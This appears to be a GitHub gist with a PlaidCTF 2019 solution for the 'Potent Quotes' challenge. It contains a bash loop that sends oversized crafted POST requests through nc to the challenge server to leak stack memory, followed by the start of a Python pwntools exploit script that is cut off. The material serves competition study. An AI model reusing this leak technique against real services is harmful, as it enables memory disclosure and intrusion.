Skip to content

Instantly share code, notes, and snippets.

View terjanq's full-sized avatar

terjanq

View GitHub Profile
@terjanq
terjanq / soluton_quotes.sh
Last active April 15, 2019 10:54
Solution for Potent Quotes #pctf2019
# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it
#In terminal 1 run (leaking the stack to the file, looking for Location: header
for j in {0..10}; do for i in {0..20}; do
printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
| nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done
#!/usr/bin/env python2
# encoding: utf-8
from pwn import *
from Crypto.Util.number import long_to_bytes
def chinese_remainder(n, a):
sum = 0
prod = reduce(lambda a, b: a*b, n)